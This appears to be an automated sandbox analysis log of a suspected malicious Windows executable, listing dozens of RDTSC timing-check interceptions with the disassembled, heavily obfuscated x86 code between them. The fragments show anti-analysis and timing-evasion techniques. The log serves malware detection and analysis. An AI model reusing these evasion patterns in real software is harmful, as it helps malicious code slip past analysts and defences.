                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1047E1C second address: 1047E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D331D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1047E37 second address: 1047E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1047E3B second address: 1047E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F0640D82076h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jg 00007F0640D8207Bh 0x00000018 jmp 00007F0640D82075h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pop edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1047E82 second address: 1047EF2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0640516B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F0640516B3Fh 0x00000010 pop edi 0x00000011 popad 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F0640516B38h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D3656h] 0x00000033 push 00000003h 0x00000035 mov si, 4A40h 0x00000039 mov si, ax 0x0000003c push 00000000h 0x0000003e push 00000003h 0x00000040 add esi, 1C52E026h 0x00000046 cld 0x00000047 call 00007F0640516B39h 0x0000004c jnp 00007F0640516B44h 0x00000052 push eax 0x00000053 push edx 0x00000054 jl 00007F0640516B36h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1047EF2 second address: 1047F34 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnl 00007F0640D8206Eh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push esi 0x00000012 jmp 00007F0640D8206Dh 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0640D82076h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1047F34 second address: 1047F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0640516B3Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1048048 second address: 10480C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0640D8206Ch 0x0000000c jnp 00007F0640D82066h 0x00000012 popad 0x00000013 add dword ptr [esp], 78E74B70h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007F0640D82068h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 push 00000003h 0x00000036 push edx 0x00000037 movsx edx, cx 0x0000003a pop edi 0x0000003b sbb esi, 3A2E9554h 0x00000041 push 00000000h 0x00000043 or edx, 37A5F4A2h 0x00000049 push 00000003h 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007F0640D82068h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 0000001Ah 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 push 73C18D0Dh 0x0000006a push eax 0x0000006b push edx 0x0000006c push ebx 0x0000006d pushad 0x0000006e popad 0x0000006f pop ebx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1040B85 second address: 1040B8B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1067809 second address: 106780F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 106780F second address: 1067834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0640516B3Bh 0x00000009 jmp 00007F0640516B46h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1067BB0 second address: 1067BC6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0640D82066h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F0640D82066h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1067BC6 second address: 1067BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1067D2A second address: 1067D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1067D2E second address: 1067D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1067D32 second address: 1067D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0640D8206Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1067D47 second address: 1067D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068433 second address: 1068440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068440 second address: 1068444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068444 second address: 106844E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0640D82066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10685DB second address: 10685E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10685E1 second address: 1068614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0640D82077h 0x00000009 jmp 00007F0640D82078h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068614 second address: 106861D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 105CB20 second address: 105CB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 105CB24 second address: 105CB47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F0640516B36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0640516B3Fh 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1068FD1 second address: 1069008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0640D82076h 0x00000009 jmp 00007F0640D82074h 0x0000000e popad 0x0000000f jng 00007F0640D8206Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1069008 second address: 1069012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1069012 second address: 1069016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1069016 second address: 1069035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0640516B47h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1069035 second address: 106904F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jne 00007F0640D82066h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 106904F second address: 1069053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 106C48A second address: 106C494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0640D82066h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 106C494 second address: 106C498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 106CACE second address: 106CB36 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0640D82066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007F0640D82077h 0x00000022 mov eax, dword ptr [eax] 0x00000024 jmp 00007F0640D82070h 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jne 00007F0640D8207Ch 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 106BA1C second address: 106BA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 106BA20 second address: 106BA2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F0640D8206Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1076B3B second address: 1076B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1076B40 second address: 1076B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F0640D82066h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1076B4C second address: 1076B52 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1076DD3 second address: 1076DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1076DDB second address: 1076DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1076F1B second address: 1076F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1076F1F second address: 1076F30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1076F30 second address: 1076F39 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1079609 second address: 1079620 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0640516B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0640516B3Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107A4A6 second address: 107A4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107AC45 second address: 107AC4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107B6F5 second address: 107B6FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107B512 second address: 107B536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F0640516B48h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107C710 second address: 107C7BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0640D82068h 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F0640D82077h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F0640D82068h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e add dword ptr [ebp+12463679h], ebx 0x00000034 push 00000000h 0x00000036 jmp 00007F0640D82074h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F0640D82068h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 call 00007F0640D8206Ah 0x0000005c cld 0x0000005d pop esi 0x0000005e xchg eax, ebx 0x0000005f push edi 0x00000060 jne 00007F0640D8206Ch 0x00000066 pop edi 0x00000067 push eax 0x00000068 push ecx 0x00000069 push eax 0x0000006a push edx 0x0000006b push esi 0x0000006c pop esi 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107DB0F second address: 107DB86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640516B40h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+1245B328h], eax 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D19B4h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F0640516B38h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov si, EC27h 0x0000003a xchg eax, ebx 0x0000003b jns 00007F0640516B3Eh 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jmp 00007F0640516B3Bh 0x0000004a jmp 00007F0640516B3Ah 0x0000004f popad 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107DB86 second address: 107DB8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107DB8C second address: 107DB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107E4E1 second address: 107E4E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 107E4E5 second address: 107E504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0640516B3Fh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1082517 second address: 108258C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007F0640D8206Dh 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D368Eh] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F0640D82068h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F0640D82068h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b clc 0x0000004c sbb bx, 2F01h 0x00000051 push eax 0x00000052 pushad 0x00000053 push esi 0x00000054 jmp 00007F0640D82070h 0x00000059 pop esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108258C second address: 1082590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1083427 second address: 108343D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0640D82066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F0640D82066h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108343D second address: 1083447 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0640516B36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1083447 second address: 10834A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D8206Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add ebx, 3B4C8ED7h 0x00000010 jp 00007F0640D8206Ch 0x00000016 add ebx, 4803C7F6h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F0640D82068h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 push 00000000h 0x0000003a or dword ptr [ebp+1246F92Bh], eax 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jng 00007F0640D8206Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10834A4 second address: 10834A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108668B second address: 108668F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108668F second address: 1086695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10876AC second address: 10876D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0640D82079h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10876D5 second address: 1087730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0640516B3Fh 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F0640516B38h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 jmp 00007F0640516B3Eh 0x0000002b and di, 4E1Dh 0x00000030 push 00000000h 0x00000032 mov edi, dword ptr [ebp+122D2DCAh] 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1087884 second address: 1087889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1089502 second address: 108950C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108950C second address: 108956C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dword ptr [ebp+122D2A87h], ecx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F0640D82068h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d pushad 0x0000002e call 00007F0640D8206Dh 0x00000033 push edx 0x00000034 pop ebx 0x00000035 pop edx 0x00000036 jmp 00007F0640D8206Eh 0x0000003b popad 0x0000003c push 00000000h 0x0000003e mov bl, cl 0x00000040 xchg eax, esi 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 pushad 0x00000045 popad 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108956C second address: 1089576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1089576 second address: 1089599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0640D82076h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108B6C5 second address: 108B6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108B6C9 second address: 108B6E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0640D82073h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108B6E6 second address: 108B700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0640516B46h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103D6CC second address: 103D6D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103D6D2 second address: 103D6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103D6DC second address: 103D6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108A8B4 second address: 108A8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F0640516B36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108B825 second address: 108B82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108A8BE second address: 108A8C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 108EDDF second address: 108EDFA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0640D82068h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F0640D8206Ch 0x00000013 jnp 00007F0640D82066h 0x00000019 rdtsc
